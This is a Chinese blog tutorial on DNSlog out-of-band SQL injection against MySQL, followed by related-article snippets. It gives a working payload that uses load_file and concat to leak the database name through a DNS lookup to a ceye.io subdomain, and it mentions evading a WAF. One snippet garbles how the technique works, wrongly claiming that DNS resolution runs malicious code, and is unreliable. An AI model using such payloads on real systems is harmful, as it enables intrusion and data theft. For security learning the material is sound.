DNSLOG注入

最新推荐文章于 2024-09-18 09:08:15 发布
最新推荐文章于 2024-09-18 09:08:15 发布
阅读量8.9k 收藏 34
点赞数 9
分类专栏: web渗透学习笔记 文章标签: SQL注入 盲注姿势 dns注入 dnslog注入 注入原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35569814/article/details/100348097
版权

注入简介

什么是dnslog注入?

dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据

为什么要进行dnslog注入?

一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。

知识扩展

首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性

secure_file_priv特性,有三种状态

  1. secure_file_priv为null    表示不允许导入导出
  2. secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
  3. secure_file_priv没有设置时,则表示没有任何限制

可了解一下load_file和outfile

LOAD_FILE()函数

LOAD_FILE()函数读取一个文件并将其内容作为字符串返回

语法为:load_file(file_name),其中file_name是文件的完整路径

此函数使用需要满足的条件

  1. 文件必须位于服务器主机上
  2. 你必须具有该FILE权限才能读取该文件。拥有该FILE权限的用户可以读取服务器主机上的任何文件,该文件是world-readable的或MySQL服务器可读的,此属性与secure_file_priv状态相关
  3. 文件必须是所有人都可读的,并且它的大小小于max_allowed_packet字节

UNC路径

什么是UNC路径?

UNC路径就是类似\\softer这样的形式的网络路径。它符合 \\servername\sharename 格式,其中 servername 是服务器名,sharename 是共享资源的名称。

目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\\servername\sharename\directory\filename。

例如把自己电脑的文件共享,你会获得如下路径,这就是UNC路径

//iZ53sl3r1890u7Z/Users/Administrator/Desktop/111.txt

DNSLOG平台

http://www.dnslog.cn

http://admin.dnslog.link

http://ceye.io

注入实现

打开靶场所在url,这里有个安全狗,可以通过注释符号绕过,也可以通过web容器的解析特性绕过,解析特性是对后缀名为txt之类的文件,不进行传参的安全检测

经过测试,此处无法使用联合查询,可以选择盲注,这里选择dns带外查询,打开ceye平台,查看我们的域名,如下图

构造合适的UNC路径,concat('//',(select database()),'.o8auqr.ceye.io/abc'),UNC路径是concat函数内的字符串,代表去访问一个域名下的abc文件夹,此处查询的域名属于o8auqr.ceye.io的子域名,在访问的过程中,解析记录会被保存

构造查询语句,poyload:and (select load_file(concat('//',(select database()),'.o8auqr.ceye.io/abc'))),点击访问

打开平台,查看记录,成功解析,如下图

注意:load_file()函数访问的是文件,所以域名后面需要添加/abc

其他查询步骤不在一一列出

秋水sir
关注
专栏目录
dnslog注入_dnslog盲注
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 1846
dnslog注入原理通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将dnslog注入盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。dnslog注入主要用于布尔型盲注、时间型盲注、有注入但是无显示,注入线程太大容易被waf拦截等情况。主要原理就是利用load_file这个函数,这个函数的目的是读取本地文件,也可以对外发送请求,利用这个函数,我们再使用concat函数将dnslog
DNSlog注入原理
sjp_1996的博客
04-20 3316
DNSlog注入原理及实验 遵守我国网络安全法,仅用于渗透测试交流学习。 DNS解析过程 用户输入域名,浏览器知道是域名,然后通过DNS解析为IP地址,最后浏览器通过IP地址访问服务器。IP地址与域名是应是一对多映射的关系。 DNSlog的产生 DNS在解析的过程中产生日志文件,这些日志文件记录了访问时间、域名、IP地址等信息内容。 实验 1、公共DNS免费平台:www.DNSlog.con,点击GetSubDomain,会随机生成一个域名。 此时打开CMD,用ping命令,ping通这个域名。因为我的
CEYE平台使用简介
Fly_鹏程万里
08-10 9528
CEYE简介 CEYE是一个用于检测带外数据(Out-of-Band)的监控平台,例如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息(例如SSRF/ XXE/ RCE等)。 CEYE的使用场景 CEYE的诞生也是因为它的使用场景而孕育而生的,一般有两种常见的情况会导致许多漏洞扫描工具漏扫: 漏洞检测或漏洞利用需要进一步的用户或系统交互。 一些漏洞类型没有直接表明...
DNS_LOG注入
学习、分享、交流
05-19 1641
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
好用的dnslog在线平台
最新发布
白帽子黑客SuperherRo
09-18 316
dnslog在线平台分享
DNSLog注入
errorr0
06-27 1173
DNSLog注入漏洞
DNSlog注入学习
mingyqf的博客
06-03 1927
原文链接:https://www.cnblogs.com/Xy–1/p/12896599.html 作者: Lushun之前一直有看到过DNSlog这个字眼,但一直没有好好去了解一下,最近又接触到了刚好来深入学习下 我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.
https防止注入_数据库DNSLog外带注入总结
weixin_39553600的博客
11-20 605
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
dnslog在线平台
Lucker_YYY的博客
08-29 681
分享几个好用的在线平台。
sqlmap结合dnslog注入
whojoe的博客
05-25 2321
sqlmap结合dnslog注入环境搭建1.phpstudy2.注入点3.配置mysql4.在线doslog网站5.sqlmap结合dnslog安装dns服务器添加转发(关键)复现手工注入sqlmap的--dns-domain参数注入参考文章 环境搭建 1.phpstudy 去官网下载安装 2.注入点 test.php <?php error_reporting(0); $link = mysqli_connect('localhost','root','root'); mysqli_set_char
sqlmap+dnslog注入复现
qq_50646296的博客
08-07 1036
2.准备两台虚拟机,一台为Kali(作为攻击机)另一台使用Windows server2008 R2(作为DNS服务器),使用本地物理机作为肉机。编辑本地肉机的dns设置,改为手动,首选DNS写windows server2008 的IP地址。查看secure_file_priv 是否为空值,如果是NULL,需要将其改为空。2 不存在,则在[mysqld]下,新增secure_file_priv=""。然后添加A记录,一条ns,作为域dns服务器,一条*匹配所有子域。配置DNS服务器ip信息和dns信息。.
DNSlog注入
7Riven's blog
12-31 941
DNSlog注入产生 测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入DNSlog注入应用场景 sql注入盲注、无回显的命令执行、无回显的SSRF DNSlog注入原理 有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)...
DNSlog注入浅谈
m0_49972294的博客
12-13 856
文章目录前言一、前提条件二、利用步骤1.注册一个域名2.数据库配置3.实际操作总结 前言 DNSlog在Web漏洞利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。 这里使用的DNS的原因是:DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。 一、前提条件 1、SQL盲注、无回显的命令执行、无回显的SSRF ; 2、只能用.
DNSlog外带原理注入分析
热门推荐
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
【技巧】DNSlog外带文件
qinjilll的博客
08-23 1437
我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名等的访问信息,类似日志文件。我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功。
DNSlog注入姿势
qq_43681802的博客
02-08 863
DNSlog注入(mysql数据库sql注入姿势) 简介:本文记录sql注入中的注入姿势DNSlog注入原理及其构造payload过程 文章目录DNSlog注入(mysql数据库sql注入姿势)前言一、什么是DNS(域名系统)?二、DNSlog注入注入场景注入具备条件什么是UNC路径?1.注入原理2.注入过程总结 前言 DNSLOG注入不是一种新的sql注入方式,而是一种注入姿势。方便为我们进行sql注入提供方法 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是DNS(域名系统)? DN
分享一个dnslog在线平台
2301_76297780的博客
06-19 537
分享一个dnslog在线平台
WEB漏洞攻防 - SQL注入 - Dnslog注入
易编橙 · 终身成长社群,相遇已是上上签!
08-02 896
存在利用瓶颈,比较鸡肋。除了注入会用到,在其他场景也会用到,主要学习dns注入原理。 必须是Windows服务器、注入实现url访问、注入点必须是高权限且可执行写入。 原理:借助DNS解析产生日志的一个作用,来实现把一些数据反弹出来,类似反弹链接的作用。 应用场景:解决不回显(反向连接),SQL注入,命令执行,SSRF等
dnslog注入原理
07-29
DNSLog注入是一种利用DNS协议的安全漏洞进行攻击的方法。它利用了DNS服务器对于域名解析请求的处理方式,通过在恶意构造的域名中插入恶意代码,从而实现对目标系统的攻击或信息收集。 具体的注入原理如下: 1. DNS解析过程:当用户在浏览器中输入一个URL并发送请求时,操作系统会将URL发送给本地DNS服务器进行解析。DNS服务器会向根域名服务器发起查询请求,逐级查询直到找到对应的IP地址。 2. 恶意域名构造:攻击者构造一个恶意域名,其中包含了恶意代码或者指向恶意服务器的IP地址。恶意代码可以是任意可执行的代码,如JavaScript代码、Shell命令等。 3. DNS解析注入:攻击者向本地DNS服务器发送一个查询请求,并在请求中包含恶意域名。本地DNS服务器在解析该域名时,会向上级DNS服务器发起查询请求,直到找到对应的IP地址。在这个查询过程中,恶意代码会被执行。 4. 恶意代码执行:当上级DNS服务器将查询结果返回给本地DNS服务器时,本地DNS服务器会将结果返回给用户的操作系统。操作系统接收到结果后,会将其交给浏览器进行处理。如果结果中包含恶意代码,浏览器会执行该代码。 通过以上的注入原理,攻击者可以实现对目标系统的攻击,如执行恶意脚本、获取敏感信息等。为了防止DNSLog注入攻击,可以采取一些安全措施,如使用DNSSEC来验证DNS响应的真实性、限制DNS解析的递归查询等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值